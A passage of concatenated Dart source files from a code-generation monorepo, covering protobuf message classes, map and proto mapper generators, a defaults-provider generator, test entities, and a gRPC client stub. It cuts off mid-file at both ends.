create()..mergeFromJson(i, r);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.deepCopy] instead. '
'Will be removed in next major version')
GComponent clone() => GComponent()..mergeFromMessage(this);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.rebuild] instead. '
'Will be removed in next major version')
GComponent copyWith(void Function(GComponent) updates) =>
super.copyWith((message) => updates(message as GComponent))
as GComponent; // ignore: deprecated_member_use
$pb.BuilderInfo get info_ => _i;
@$core.pragma('dart2js:noInline')
static GComponent create() => GComponent._();
GComponent createEmptyInstance() => create();
static $pb.PbList<GComponent> createRepeated() => $pb.PbList<GComponent>();
@$core.pragma('dart2js:noInline')
static GComponent getDefault() => _defaultInstance ??=
$pb.GeneratedMessage.$_defaultFor<GComponent>(create);
static GComponent? _defaultInstance;
@$pb.TagNumber(1)
$core.String get description => $_getSZ(0);
@$pb.TagNumber(1)
set description($core.String v) {
$_setString(0, v);
}
@$pb.TagNumber(1)
$core.bool hasDescription() => $_has(0);
@$pb.TagNumber(1)
void clearDescription() => clearField(1);
}
class GListOfComponent extends $pb.GeneratedMessage {
static final $pb.BuilderInfo _i = $pb.BuilderInfo(
const $core.bool.fromEnvironment('protobuf.omit_message_names')
? ''
: 'GListOfComponent',
createEmptyInstance: create)
..pc<GComponent>(
1,
const $core.bool.fromEnvironment('protobuf.omit_field_names')
? ''
: 'items',
$pb.PbFieldType.PM,
subBuilder: GComponent.create)
..hasRequiredFields = false;
GListOfComponent._() : super();
factory GListOfComponent({
$core.Iterable<GComponent>? items,
}) {
final _result = create();
if (items != null) {
_result.items.addAll(items);
}
return _result;
}
factory GListOfComponent.fromBuffer($core.List<$core.int> i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromBuffer(i, r);
factory GListOfComponent.fromJson($core.String i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromJson(i, r);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.deepCopy] instead. '
'Will be removed in next major version')
GListOfComponent clone() => GListOfComponent()..mergeFromMessage(this);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.rebuild] instead. '
'Will be removed in next major version')
GListOfComponent copyWith(void Function(GListOfComponent) updates) =>
super.copyWith((message) => updates(message as GListOfComponent))
as GListOfComponent; // ignore: deprecated_member_use
$pb.BuilderInfo get info_ => _i;
@$core.pragma('dart2js:noInline')
static GListOfComponent create() => GListOfComponent._();
GListOfComponent createEmptyInstance() => create();
static $pb.PbList<GListOfComponent> createRepeated() =>
$pb.PbList<GListOfComponent>();
@$core.pragma('dart2js:noInline')
static GListOfComponent getDefault() => _defaultInstance ??=
$pb.GeneratedMessage.$_defaultFor<GListOfComponent>(create);
static GListOfComponent? _defaultInstance;
@$pb.TagNumber(1)
$core.List<GComponent> get items => $_getList(0);
}
<|start_filename|>entity/entity_generator/lib/src/copywith_generator/field_descriptor.dart<|end_filename|>
import 'package:analyzer/dart/element/element.dart';
import 'package:source_gen/source_gen.dart';
import 'package:squarealfa_entity_annotations/squarealfa_entity_annotations.dart';
import 'package:squarealfa_generators_common/squarealfa_generators_common.dart';
class FieldDescriptor extends FieldDescriptorBase {
FieldDescriptor._(
FieldElement fieldElement,
) : super.fromFieldElement(fieldElement);
factory FieldDescriptor.fromFieldElement(
FieldElement fieldElement,
) {
return FieldDescriptor._(
fieldElement,
);
}
bool get typeHasEntityMapAnnotation {
var annotation = TypeChecker.fromRuntime(BuildBuilder)
.firstAnnotationOf(fieldElementType.element!);
return annotation != null;
}
bool get parameterTypeHasEntityMapAnnotation {
var annotation = TypeChecker.fromRuntime(BuildBuilder)
.firstAnnotationOf(parameterType.element!);
return annotation != null;
}
}
<|start_filename|>defaults_provider/test/lib/src/recipe.dart<|end_filename|>
import 'package:decimal/decimal.dart';
import 'package:defaults_provider_annotations/defaults_provider_annotations.dart';
import 'category.dart';
import 'ingredient.dart';
part 'recipe.g.dart';
@DefaultsProvider(createDefaultsProviderBaseClass: true)
class Recipe {
final String key;
final String title;
final List<Ingredient> ingredients;
final int numPosts;
final double doubleNumPosts;
final Decimal decimalNumPosts;
final String? runtimeTag;
final Ingredient mainIngredient;
final Category category;
Recipe({
this.key = '',
required this.title,
required this.ingredients,
this.runtimeTag,
required this.numPosts,
required this.doubleNumPosts,
required this.decimalNumPosts,
required this.mainIngredient,
required this.category,
});
}
class $RecipeDefaultsProvider extends $RecipeDefaultsProviderBase {
@override
Category get category => Category(title: 'my category');
}
<|start_filename|>entity_adapter/example/lib/grpc/asset.pbjson.dart<|end_filename|>
///
// Generated code. Do not modify.
// source: asset.proto
//
// @dart = 2.12
// ignore_for_file: annotate_overrides,camel_case_types,unnecessary_const,non_constant_identifier_names,library_prefixes,unused_import,unused_shown_name,return_of_invalid_type,unnecessary_this,prefer_final_fields,deprecated_member_use_from_same_package
import 'dart:core' as $core;
import 'dart:convert' as $convert;
import 'dart:typed_data' as $typed_data;
@$core.Deprecated('Use gAssetDescriptor instead')
const GAsset$json = {
'1': 'GAsset',
'2': [
{'1': 'description', '3': 1, '4': 1, '5': 9, '10': 'description'},
{'1': 'value', '3': 2, '4': 1, '5': 9, '10': 'value'},
],
};
/// Descriptor for `GAsset`. Decode as a `google.protobuf.DescriptorProto`.
final $typed_data.Uint8List gAssetDescriptor = $convert.base64Decode(
'CgZHQXNzZXQSIAoLZGVzY3JpcHRpb24YASABKAlSC2Rlc2NyaXB0aW9uEhQKBXZhbHVlGAIgASgJUgV2YWx1ZQ==');
@$core.Deprecated('Use gListOfAssetDescriptor instead')
const GListOfAsset$json = {
'1': 'GListOfAsset',
'2': [
{'1': 'items', '3': 1, '4': 3, '5': 11, '6': '.GAsset', '10': 'items'},
],
};
/// Descriptor for `GListOfAsset`. Decode as a `google.protobuf.DescriptorProto`.
final $typed_data.Uint8List gListOfAssetDescriptor = $convert.base64Decode(
'CgxHTGlzdE9mQXNzZXQSHQoFaXRlbXMYASADKAsyBy5HQXNzZXRSBWl0ZW1z');
<|start_filename|>map_mapper/test_mongo/lib/src/entity.dart<|end_filename|>
abstract class Entity {
final String key;
Entity({
required this.key,
});
}
<|start_filename|>map_mapper/example/lib/src/recipe.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'recipe.dart';
// **************************************************************************
// MapMapGenerator
// **************************************************************************
class $RecipeMapMapper extends MapMapper<Recipe> {
const $RecipeMapMapper();
@override
Recipe fromMap(Map<String, dynamic> map) {
final $kh = const DefaultKeyHandler();
return Recipe(
key: $kh.keyFromMap(map, 'key'),
title: map['ptitle'] as String,
ingredients: List<Ingredient>.unmodifiable(map['ingredients']
.map((e) => const $IngredientMapMapper().fromMap(e))),
);
}
@override
Map<String, dynamic> toMap(Recipe instance) {
final $kh = const DefaultKeyHandler();
final map = <String, dynamic>{};
$kh.keyToMap(map, instance.key, 'key');
map['ptitle'] = instance.title;
map['ingredients'] = instance.ingredients
.map((e) => const $IngredientMapMapper().toMap(e))
.toList();
return map;
}
}
extension $RecipeMapExtension on Recipe {
Map<String, dynamic> toMap() => const $RecipeMapMapper().toMap(this);
static Recipe fromMap(Map<String, dynamic> map) =>
const $RecipeMapMapper().fromMap(map);
}
extension $MapRecipeExtension on Map<String, dynamic> {
Recipe toRecipe() => const $RecipeMapMapper().fromMap(this);
}
class $RecipeFieldNames {
final $kh = const DefaultKeyHandler();
final String fieldName;
final String prefix;
$RecipeFieldNames.sub(this.fieldName) : prefix = fieldName + '.';
const $RecipeFieldNames()
: fieldName = '',
prefix = '';
static const _key = 'key';
String get key => prefix + $kh.fieldNameToMapKey(_key);
static const _title = 'title';
String get title => prefix + _title;
static const _ingredients = 'ingredients';
$IngredientFieldNames get ingredients =>
$IngredientFieldNames.sub(prefix + _ingredients);
@override
String toString() => fieldName;
}
<|start_filename|>map_mapper/test_mongo/lib/src/person.dart<|end_filename|>
import 'mongo_key_handler.dart';
import 'package:map_mapper_annotations/map_mapper_annotations.dart';
import 'entity.dart';
part 'person.g.dart';
@MapMap(useDefaultsProvider: true)
class Person extends Entity {
final String name;
Person({
required String key,
required this.name,
}) : super(key: key);
}
class $PersonDefaultsProvider {
String get key => '';
String get name => '';
}
<|start_filename|>firebase-auth-admin/bin/get_custom_claims_command.dart<|end_filename|>
import 'package:args/args.dart';
import 'command.dart';
import 'common_options.dart';
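/// Options for the `getCustomClaims` CLI command, which targets the user
/// identified by [uid].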
class GetCustomClaimsCommand extends Command {
final String uid;
GetCustomClaimsCommand(
CommonOptions commonOptions,
this.uid,
) : super(commonOptions);
factory GetCustomClaimsCommand.fromResults(
CommonOptions commonOptions,
ArgResults results,
) {
final uid = results['uid'] as String;
return GetCustomClaimsCommand(commonOptions, uid);
}
static void addCommand(ArgParser parser) {
var cc = parser.addCommand('getCustomClaims');
cc.addOption(
'uid',
abbr: 'u',
help: 'UID of the user',
mandatory: true,
);
}
}
<|start_filename|>map_mapper/map_mapper_annotations/lib/src/default_key_handler.dart<|end_filename|>
import 'key_handler.dart';
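/// Default [KeyHandler] that stores the entity key under the `_key` map entry
/// and omits the entry entirely when the key is empty.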
class DefaultKeyHandler extends KeyHandler {
const DefaultKeyHandler();
@override
String keyFromMap(Map<String, dynamic> map, [String fieldName = '']) {
final mapKey = fieldNameToMapKey(fieldName);
return map[mapKey] ?? '';
}
@override
void keyToMap(Map<String, dynamic> map, String value,
[String fieldName = '']) {
final mapKey = fieldNameToMapKey(fieldName);
if (value.isEmpty) {
map.remove(mapKey);
} else {
map[mapKey] = value;
}
}
@override
String fieldNameToMapKey(String fieldName) {
switch (fieldName) {
case '':
case 'key':
return '_key';
default:
return fieldName;
}
}
}
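// Illustrative sketch of the mapping implemented above:
//
//   const kh = DefaultKeyHandler();
//   kh.fieldNameToMapKey('');      // => '_key'
//   kh.fieldNameToMapKey('key');   // => '_key'
//   kh.fieldNameToMapKey('title'); // => 'title'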
<|start_filename|>map_mapper/test_mongo/lib/src/component.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'component.dart';
// **************************************************************************
// MapMapGenerator
// **************************************************************************
class $ComponentMapMapper extends MapMapper<Component> {
const $ComponentMapMapper();
@override
Component fromMap(Map<String, dynamic> map) {
return Component(
description: map['description'] as String,
);
}
@override
Map<String, dynamic> toMap(Component instance) {
final map = <String, dynamic>{};
map['description'] = instance.description;
return map;
}
}
extension $ComponentMapExtension on Component {
Map<String, dynamic> toMap() => const $ComponentMapMapper().toMap(this);
static Component fromMap(Map<String, dynamic> map) =>
const $ComponentMapMapper().fromMap(map);
}
extension $MapComponentExtension on Map<String, dynamic> {
Component toComponent() => const $ComponentMapMapper().fromMap(this);
}
class $ComponentFieldNames {
final String fieldName;
final String prefix;
$ComponentFieldNames.sub(this.fieldName) : prefix = fieldName + '.';
const $ComponentFieldNames()
: fieldName = '',
prefix = '';
static const _description = 'description';
String get description => prefix + _description;
@override
String toString() => fieldName;
}
<|start_filename|>defaults_provider/test/lib/src/all_nullable.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'all_nullable.dart';
// **************************************************************************
// DefaultsProviderGenerator
// **************************************************************************
class $AllNullableDefaultsProvider {
const $AllNullableDefaultsProvider();
AllNullable createWithDefaults() {
return AllNullable();
}
}
<|start_filename|>defaults_provider/defaults_provider_generator/lib/src/defaults_provider_generator.dart<|end_filename|>
import 'package:analyzer/dart/element/element.dart';
import 'package:build/build.dart';
import 'package:defaults_provider_annotations/defaults_provider_annotations.dart';
import 'package:defaults_provider_generator/src/field_code_generator.dart';
import 'package:source_gen/source_gen.dart';
import 'package:squarealfa_generators_common/squarealfa_generators_common.dart';
import 'field_descriptor.dart';
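/// Generates a `$<ClassName>DefaultsProvider` (or `...Base`) class exposing a
/// default-value getter for every non-nullable field and, for concrete
/// classes, a `createWithDefaults` factory method.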
class DefaultsProviderGenerator
extends GeneratorForAnnotation<DefaultsProvider> {
@override
String generateForAnnotatedElement(
Element element,
ConstantReader annotation,
BuildStep buildStep,
) {
var validatable = _hydrateAnnotation(annotation);
var createBaseClass = validatable.createDefaultsProviderBaseClass;
try {
return generateDefaultsProvider(element, createBaseClass);
} catch (ex, stack) {
print('*** Exception: $ex with stack: $stack');
rethrow;
}
}
static String generateDefaultsProvider(
Element element, bool createBaseClass) {
var classElement = element.asClassElement();
if (classElement.kind == ElementKind.ENUM) return '';
var superTypeElement = classElement.supertype!.element;
var annotation = TypeChecker.fromRuntime(DefaultsProvider)
.firstAnnotationOf(superTypeElement);
final superClassHasDefaultsProvider = annotation != null;
final className = classElement.name;
final constructorFields = _getFieldDescriptors(classElement, true);
final parameterFieldBuffer = StringBuffer();
final constructorFieldBuffer = StringBuffer();
for (var field in constructorFields) {
parameterFieldBuffer
.writeln('${field.fieldElementTypeName}? ${field.displayName},');
constructorFieldBuffer.writeln(
'${field.displayName}: ${field.displayName} ?? this.${field.displayName},');
}
final propertyFields = _getFieldDescriptors(classElement, false);
final propertyFieldBuffer = StringBuffer();
for (var field in constructorFields) {
if (!superClassHasDefaultsProvider ||
propertyFields
.any((element) => element.displayName == field.displayName)) {
var gen =
FieldCodeGenerator.fromFieldDescriptor(field, createBaseClass);
propertyFieldBuffer.writeln(
'''${field.fieldElementTypeName} get ${field.displayName} ${createBaseClass && gen.defaultExpression == '' ? '' : ' => ' + gen.defaultExpression};''');
} else {
propertyFieldBuffer.writeln(
'''${field.fieldElementTypeName} get ${field.displayName} => _superDefaultsProvider.${field.displayName};''');
}
}
final providerClassName =
'\$${className}DefaultsProvider${createBaseClass ? 'Base' : ''}';
final superDeclaration = superClassHasDefaultsProvider
? '''static const _superDefaultsProvider = \$${superTypeElement.name}DefaultsProvider();'''
: '';
final constructor = classElement.isAbstract
? ''
: '''
$className createWithDefaults( ${parameterFieldBuffer.isEmpty ? '' : '{ $parameterFieldBuffer }'} ) {
return $className(
$constructorFieldBuffer
);
}
''';
return '''
${createBaseClass ? 'abstract' : ''} class $providerClassName {
const $providerClassName();
$superDeclaration
$constructor
$propertyFieldBuffer
}
''';
}
}
Iterable<FieldDescriptor> _getFieldDescriptors(
ClassElement classElement, bool includeInherited) {
final fieldSet =
classElement.getSortedFieldSet(includeInherited: includeInherited);
final fieldDescriptors = fieldSet
.map((fieldElement) => FieldDescriptor.fromFieldElement(fieldElement))
.where((element) => !element.isNullable);
return fieldDescriptors;
}
DefaultsProvider _hydrateAnnotation(ConstantReader reader) {
var defaultsProvider = DefaultsProvider(
createDefaultsProviderBaseClass:
reader.read('createDefaultsProviderBaseClass').literalValue as bool? ??
false,
);
return defaultsProvider;
}
<|start_filename|>defaults_provider/defaults_provider_generator/lib/src/field_descriptor.dart<|end_filename|>
import 'package:analyzer/dart/element/element.dart';
import 'package:defaults_provider_annotations/defaults_provider_annotations.dart';
import 'package:source_gen/source_gen.dart';
import 'package:squarealfa_generators_common/squarealfa_generators_common.dart';
class FieldDescriptor extends FieldDescriptorBase {
FieldDescriptor._(FieldElement fieldElement)
: super.fromFieldElement(fieldElement);
factory FieldDescriptor.fromFieldElement(FieldElement fieldElement) {
return FieldDescriptor._(fieldElement);
}
bool get typeHasDefaultsProvider {
var annotation = TypeChecker.fromRuntime(DefaultsProvider)
.firstAnnotationOf(fieldElementType.element!);
return annotation != null;
}
}
<|start_filename|>proto_mapper/proto_generator/lib/src/proto_services_mapper/proto_services_client_generator.dart<|end_filename|>
import 'package:analyzer/dart/element/element.dart';
import 'package:analyzer/dart/element/nullability_suffix.dart';
import 'package:build/build.dart';
import 'package:proto_annotations/proto_annotations.dart';
import 'package:proto_generator/src/proto_common.dart';
import 'package:proto_generator/src/proto_mapper/field_code_generator.dart';
import 'package:proto_generator/src/proto_mapper/field_descriptor.dart';
import 'package:source_gen/source_gen.dart';
import 'package:squarealfa_generators_common/squarealfa_generators_common.dart';
import '../proto_services_generator_base.dart';
import 'method_descriptor.dart';
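/// Generates a `<ServiceName>ClientBase` class that implements the annotated
/// abstract service by mapping every `Future`-returning method onto the
/// corresponding call of the generated gRPC client.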
class ProtoServicesClientGenerator
extends GeneratorForAnnotation<MapProtoServices> {
final BuilderOptions options;
late String _prefix;
late String _defaultPackage;
ProtoServicesClientGenerator(this.options) {
var config = options.config;
_prefix = config['prefix'] as String? ?? 'G';
_defaultPackage = config['package'] as String? ?? '';
}
@override
String generateForAnnotatedElement(
Element element,
ConstantReader annotation,
BuildStep buildStep,
) {
var readAnnotation = _hydrateAnnotation(annotation, prefix: _prefix);
final classElement = element.asClassElement();
final generator = _Generator(
annotation: readAnnotation,
classElement: classElement,
prefix: _prefix,
packageName: readAnnotation.packageName != '' ? '' : _defaultPackage,
);
var ret = generator.generateForClass();
return ret;
}
}
class _Generator extends ProtoServicesGeneratorBase {
final MapProtoServices annotation;
final Iterable<MethodDescriptor> methodDescriptors;
final String packageName;
_Generator({
required this.annotation,
required String prefix,
required ClassElement classElement,
required this.packageName,
}) : methodDescriptors = _getMethodDescriptors(classElement, annotation),
super(classElement: classElement, prefix: prefix);
String generateForClass() {
final methodBuffer = StringBuffer();
for (var methodDescriptor in methodDescriptors) {
final methodName = methodDescriptor.name;
if (!methodDescriptor.returnTypeIsFuture) {
// we can't know how to implement sync methods
continue;
}
final parameters = _getParameters(methodDescriptor);
final assignments = StringBuffer();
final gParm = _getGParameter(methodDescriptor, assignments);
final resultBuffer = StringBuffer();
final returnBuffer = StringBuffer();
final returnType =
_getReturnType(methodDescriptor, resultBuffer, returnBuffer);
methodBuffer.writeln('''
@override
Future<$returnType> $methodName($parameters) async {
final serviceClient = await get${prefix}ServiceClient();
final \$parm = $gParm;
$assignments
$resultBuffer await serviceClient.$methodName(\$parm);
$returnBuffer
}
''');
}
final className = classElement.name;
final serviceClassName = (className.endsWith('Base')
? className.substring(0, className.length - 'Base'.length)
: className.endsWith('Interface')
? className.substring(0, className.length - 'Interface'.length)
: className);
var ret = '''
abstract class ${serviceClassName}ClientBase implements $className {
Future<$prefix${serviceClassName}Client> get${prefix}ServiceClient();
$methodBuffer
}
''';
return ret;
}
String _getParameters(MethodDescriptor methodDescriptor) {
final parameters = StringBuffer();
for (final parm in methodDescriptor.methodElement.parameters) {
final pType = parm.type;
final pName = parm.displayName;
parameters.write('$pType $pName, ');
}
return parameters.toString();
}
String _getGParameter(
MethodDescriptor methodDescriptor,
StringBuffer assignments,
) {
final protoMappedParameter = _getProtoMappedParameter(methodDescriptor);
if (protoMappedParameter.isNotEmpty) return protoMappedParameter;
final messageName = getParameterMessageName(methodDescriptor.pascalName);
_addAssignments(methodDescriptor, assignments);
return '$messageName()';
}
void _addAssignments(
MethodDescriptor methodDescriptor, StringBuffer assignments) {
for (final parm in methodDescriptor.methodElement.parameters) {
final type = parm.type;
final fd = FieldDescriptor(
MapProto(
prefix: prefix,
packageName: packageName,
),
displayName: parm.displayName,
isFinal: true,
name: parm.name,
fieldElementType: type,
);
final fieldCodeGenerator = FieldCodeGenerator.fromFieldDescriptor(
fd,
refName: '',
protoRefName: '\$parm',
);
final expression = fieldCodeGenerator.toProtoMap;
assignments.writeln(expression);
}
}
String _getProtoMappedParameter(MethodDescriptor methodDescriptor) {
if (methodDescriptor.methodElement.parameters.length != 1) {
return '';
}
final finalType = methodDescriptor.parameterType.finalType;
if (!finalType.hasProto) return '';
final parmName =
methodDescriptor.methodElement.parameters.first.displayName;
final toProto = methodDescriptor.parameterType.futureType.isList
? '${prefix}ListOf$finalType(items: $parmName.map((i) => i.toProto()))'
: '$parmName.toProto()';
return toProto;
}
  String _getReturnType(
MethodDescriptor methodDescriptor,
StringBuffer resultBuffer,
StringBuffer returnBuffer,
) {
final protoMappedReturnType =
_getProtoMappedReturnType(methodDescriptor, resultBuffer, returnBuffer);
if (protoMappedReturnType.isNotEmpty) {
return protoMappedReturnType;
}
final rType = methodDescriptor.methodElement.returnType.futureType
.getDisplayString(withNullability: true);
final futureType = methodDescriptor.returnType.futureType;
if (futureType.isVoid) {
return rType;
}
final fd = FieldDescriptor(
MapProto(
prefix: prefix,
packageName: packageName,
),
displayName: 'value',
isFinal: true,
name: 'value',
fieldElementType: futureType,
);
final fieldCodeGenerator = FieldCodeGenerator.fromFieldDescriptor(
fd,
refName: '\$result',
);
resultBuffer.write(r'final $result = ');
final assignment = fieldCodeGenerator.fromProtoExpression;
returnBuffer.writeln('final \$ret = $assignment;');
returnBuffer.writeln(r'return $ret;');
return rType;
}
}
String _getProtoMappedReturnType(
MethodDescriptor methodDescriptor,
StringBuffer resultBuffer,
StringBuffer returnBuffer,
) {
final returnType = methodDescriptor.returnType;
final finalType = returnType.finalType;
if (finalType.isVoid) return '';
if (finalType.element?.kind == ElementKind.ENUM) return '';
if (!finalType.hasMapProto) return '';
if (returnType.futureType.nullabilitySuffix == NullabilitySuffix.question) {
return '';
}
final entityType = finalType.getDisplayString(withNullability: false);
final futureType = returnType.futureType;
final toEntity = returnType.futureType.isList
? '\$result.items.map((i) => i.to$entityType()).toList()'
: '\$result.to$entityType()';
resultBuffer.write(r'final $result = ');
returnBuffer.write('final \$ret = $toEntity;');
returnBuffer.write(r'return $ret;');
return futureType.getDisplayString(withNullability: true);
}
Iterable<MethodDescriptor> _getMethodDescriptors(
ClassElement classElement,
MapProtoServices annotation,
) {
final methods = classElement.getSortedMethods();
final methodDescriptors = methods
.map((fieldElement) => MethodDescriptor.fromMethodElement(
classElement,
fieldElement,
annotation,
))
.where((element) => element.isProtoIncluded);
return methodDescriptors;
}
MapProtoServices _hydrateAnnotation(ConstantReader reader,
{String prefix = ''}) {
var ret = MapProtoServices(
prefix: reader.read('prefix').literalValue as String? ?? prefix,
);
return ret;
}
<|start_filename|>entity/entity_generator/lib/src/validation/validators/null_validator.dart<|end_filename|>
import 'package:tuple/tuple.dart';
import '../field_descriptor.dart';
import 'property_validator.dart';
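/// Emits a null check returning a [RequiredValidationError] for non-nullable
/// fields; nullable fields produce no validation code.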
class NullValidator extends PropertyValidator {
@override
Tuple2<String, bool> createValidatorCode(
FieldDescriptor fieldDescriptor,
bool previousNullCheck,
) {
if (fieldDescriptor.isNullable) {
return createResult();
}
return createResult('''
if (value == null)
{
return RequiredValidationError('${fieldDescriptor.displayName}');
}
''', true);
}
}
<|start_filename|>proto_mapper/test/lib/src/recipe_services_base.dart<|end_filename|>
import 'package:grpc/grpc.dart';
import 'package:proto_annotations/proto_annotations.dart';
import 'package:proto_generator_test/grpc/calc_parameters.pb.dart';
import 'package:proto_generator_test/grpc/calc_result.pb.dart';
import 'package:proto_generator_test/grpc/key.pb.dart';
import 'package:proto_generator_test/grpc/recipe.pb.dart';
import 'package:proto_generator_test/grpc/recipe_services_base.services.pbgrpc.dart';
import 'package:proto_generator_test/grpc/recipe_type.pbenum.dart';
import 'package:proto_generator_test/src/calc_parameters.dart';
import 'package:proto_generator_test/src/calc_result.dart';
import 'package:proto_generator_test/src/crud_services_base.dart';
import 'package:proto_generator_test/src/recipe_type.dart';
import '../proto_generator_test.dart';
import 'key.dart';
part 'recipe_services_base.g.dart';
@protoServices
@mapProtoServices
abstract class RecipeServiceBase extends CrudServicesBase<Recipe> {
Future<List<Recipe>> search();
Future<List<Recipe>?> searchNullable();
Future<void> insertMany(List<Recipe> recipes);
Future<Recipe?> getNullable();
Future<int> count();
Future<int?> countNullable(bool returnNull);
Future<void> reindex();
Future<RecipeTypes> getMainRecipeType();
Future<RecipeTypes?> getMainRecipeTypeNullable();
Future<List<RecipeTypes>> getRecipeTypeList();
Future<List<RecipeTypes>?> getRecipeTypeListNullable();
Future<List<int>> getListOfInts();
Future<List<int>?> getListOfIntsNullable();
Future<CalcResult> doCalculation(CalcParameters parameters);
Future<void> receiveLotsOfArgs(
String pString,
int pInt,
RecipeTypes pRecipeTypes,
Recipe pRecipe,
List<String> pListStrings,
List<int> pListInts,
List<RecipeTypes> pListRecipeTypes,
List<Recipe> pListRecipes,
Set<String> pSetString,
Set<int> pSetInt,
Set<RecipeTypes> pSetRecipeTypes,
Set<Recipe> pSetRecipe,
Iterable<String> pIterableString,
Iterable<int> pIterableInt,
Iterable<RecipeTypes> pIterableRecipeTypes,
Iterable<Recipe> pIterableRecipe,
);
Future<List<int>> receiveLotsOfNullableArgs(
String? pString,
int? pInt,
RecipeTypes? pRecipeTypes,
Recipe? pRecipe,
List<String>? pListStrings,
List<int>? pListInts,
List<RecipeTypes>? pListRecipeTypes,
List<Recipe>? pListRecipes,
Set<String>? pSetString,
Set<int>? pSetInt,
Set<RecipeTypes>? pSetRecipeTypes,
Set<Recipe>? pSetRecipe,
Iterable<String>? pIterableString,
Iterable<int>? pIterableInt,
Iterable<RecipeTypes>? pIterableRecipeTypes,
Iterable<Recipe>? pIterableRecipe,
);
}
<|start_filename|>proto_mapper/proto_generator/lib/src/proto_mapper/field_code_generators/entity_field_code_generator.dart<|end_filename|>
import '../field_code_generator.dart';
import '../field_descriptor.dart';
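/// Generates proto conversion expressions for entity-typed fields by
/// delegating to the field type's generated `$<Type>ProtoMapper`.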
class EntityFieldCodeGenerator extends FieldCodeGenerator {
EntityFieldCodeGenerator(
FieldDescriptor fieldDescriptor, {
String refName = FieldCodeGenerator.defaultRefName,
String protoRefName = FieldCodeGenerator.defaultProtoRefName,
}) : super(
fieldDescriptor,
refName: refName,
protoRefName: protoRefName,
);
@override
String get toProtoExpression =>
''' const \$${fieldDescriptor.fieldElementTypeName}ProtoMapper().toProto($instanceReference)''';
@override
String get fromProtoNonNullableExpression =>
''' const \$${fieldDescriptor.fieldElementTypeName}ProtoMapper().fromProto($ref$fieldName)''';
}
<|start_filename|>grpc_host/lib/src/hosting/hosting.dart<|end_filename|>
export 'services_host.dart';
export 'principal_interceptor.dart';
export 'host_parameters.dart';
export 'host.dart';
<|start_filename|>proto_mapper/test/lib/grpc/recipe_services_base.services.pbgrpc.dart<|end_filename|>
///
// Generated code. Do not modify.
// source: recipe_services_base.services.proto
//
// @dart = 2.12
// ignore_for_file: annotate_overrides,camel_case_types,unnecessary_const,non_constant_identifier_names,library_prefixes,unused_import,unused_shown_name,return_of_invalid_type,unnecessary_this,prefer_final_fields
import 'dart:async' as $async;
import 'dart:core' as $core;
import 'package:grpc/service_api.dart' as $grpc;
import 'recipe.pb.dart' as $0;
import 'key.pb.dart' as $1;
import 'recipe_services_base.services.pb.dart' as $2;
import 'calc_parameters.pb.dart' as $3;
import 'calc_result.pb.dart' as $4;
export 'recipe_services_base.services.pb.dart';
class GRecipeServiceClient extends $grpc.Client {
static final _$create = $grpc.ClientMethod<$0.GRecipe, $0.GRecipe>(
'/GRecipeService/Create',
($0.GRecipe value) => value.writeToBuffer(),
($core.List<$core.int> value) => $0.GRecipe.fromBuffer(value));
static final _$update = $grpc.ClientMethod<$0.GRecipe, $0.GRecipe>(
'/GRecipeService/Update',
($0.GRecipe value) => value.writeToBuffer(),
($core.List<$core.int> value) => $0.GRecipe.fromBuffer(value));
static final _$delete =
$grpc.ClientMethod<$1.GKey, $2.G_GRecipeService_Delete_Return>(
'/GRecipeService/Delete',
($1.GKey value) => value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_Delete_Return.fromBuffer(value));
static final _$get = $grpc.ClientMethod<$1.GKey, $0.GRecipe>(
'/GRecipeService/Get',
($1.GKey value) => value.writeToBuffer(),
($core.List<$core.int> value) => $0.GRecipe.fromBuffer(value));
static final _$search = $grpc.ClientMethod<
$2.G_GRecipeService_Search_Parameters, $0.GListOfRecipe>(
'/GRecipeService/Search',
($2.G_GRecipeService_Search_Parameters value) => value.writeToBuffer(),
($core.List<$core.int> value) => $0.GListOfRecipe.fromBuffer(value));
static final _$searchNullable = $grpc.ClientMethod<
$2.G_GRecipeService_SearchNullable_Parameters,
$2.G_GRecipeService_SearchNullable_Return>(
'/GRecipeService/SearchNullable',
($2.G_GRecipeService_SearchNullable_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_SearchNullable_Return.fromBuffer(value));
static final _$insertMany = $grpc.ClientMethod<$0.GListOfRecipe,
$2.G_GRecipeService_InsertMany_Return>(
'/GRecipeService/InsertMany',
($0.GListOfRecipe value) => value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_InsertMany_Return.fromBuffer(value));
static final _$getNullable = $grpc.ClientMethod<
$2.G_GRecipeService_GetNullable_Parameters,
$2.G_GRecipeService_GetNullable_Return>(
'/GRecipeService/GetNullable',
($2.G_GRecipeService_GetNullable_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetNullable_Return.fromBuffer(value));
static final _$count = $grpc.ClientMethod<
$2.G_GRecipeService_Count_Parameters,
$2.G_GRecipeService_Count_Return>(
'/GRecipeService/Count',
($2.G_GRecipeService_Count_Parameters value) => value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_Count_Return.fromBuffer(value));
static final _$countNullable = $grpc.ClientMethod<
$2.G_GRecipeService_CountNullable_Parameters,
$2.G_GRecipeService_CountNullable_Return>(
'/GRecipeService/CountNullable',
($2.G_GRecipeService_CountNullable_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_CountNullable_Return.fromBuffer(value));
static final _$reindex = $grpc.ClientMethod<
$2.G_GRecipeService_Reindex_Parameters,
$2.G_GRecipeService_Reindex_Return>(
'/GRecipeService/Reindex',
($2.G_GRecipeService_Reindex_Parameters value) => value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_Reindex_Return.fromBuffer(value));
static final _$getMainRecipeType = $grpc.ClientMethod<
